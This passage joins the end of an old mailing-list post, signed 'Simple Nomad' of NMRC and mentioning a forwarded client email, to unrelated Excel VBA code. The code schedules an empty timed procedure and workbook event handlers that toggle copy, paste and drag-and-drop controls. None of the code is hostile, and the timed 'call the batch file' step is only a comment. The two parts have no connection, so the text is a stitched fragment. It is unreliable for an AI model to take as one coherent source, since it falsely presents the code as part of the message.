from an old client, and considering the poor rating of this guy I'd say
there's a lawsuit in the making as it apparently went not only to me but
to an internal email bulletin board.
Simple Nomad //
[email protected] // ....no rest for the Wicca'd....
www.nmrc.org //
Sub Activate_timer()
' at a certain time in the future
'Application.OnTime DateSerial(2014,01,01)+TimeSerial(0,0,0), "DoSomething"
' or by specifying the time interval
Application.OnTime Now + TimeValue("01:40:00"), "DoSomething"
End Sub
Sub DoSomething()
'call the batch file
' (body left empty in the original post; this is the procedure OnTime schedules)
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
With Application
.CellDragAndDrop = True
.OnKey "^c"
.OnKey "^v"
.OnKey "^x"
.OnKey "+{DEL}"
.OnKey "^{INSERT}"
.CutCopyMode = False
End With
Dim Ctrl As Office.CommandBarControl
For Each Ctrl In Application.CommandBars.FindControls(ID:=19) ' Copy
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=21) ' Cut
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=22) ' Paste
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=755) ' Paste Special
Ctrl.Enabled = True
Next Ctrl
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
With Application
.CellDragAndDrop = True
.OnKey "^c"
.OnKey "^v"
.OnKey "^x"
.OnKey "+{DEL}"
.OnKey "^{INSERT}"
.CutCopyMode = False
End With
Dim Ctrl As Office.CommandBarControl
For Each Ctrl In Application.CommandBars.FindControls(ID:=19) ' Copy
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=21) ' Cut
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=22) ' Paste
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=755) ' Paste Special
Ctrl.Enabled = True
Next Ctrl
End Sub
Private Sub Workbook_Activate()
Dim oCtrl As Office.CommandBarControl
Application.CellDragAndDrop = False
End Sub